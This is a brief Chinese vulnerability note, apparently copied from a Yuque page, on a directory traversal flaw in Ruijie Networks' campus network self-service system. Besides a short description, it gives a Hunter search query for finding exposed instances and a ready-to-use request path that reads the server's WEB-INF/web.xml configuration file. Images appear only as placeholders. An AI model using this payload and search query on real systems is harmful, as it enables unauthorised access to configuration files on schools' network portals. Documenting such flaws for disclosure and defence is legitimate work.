登录 白背景

锐捷网络股份有限公司校园网自助服务系统存在目录穿越漏洞

一、漏洞简介

锐捷网络股份有限公司校园网自助服务系统存在目录穿越漏洞

二、影响版本

  • 锐捷网络股份有限公司校园网自助服务系统

三、资产测绘

  • hunterapp="校园网自助服务系统"
  • 特征

image.png

四、漏洞复现

/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/zplmo3zy6shl51ta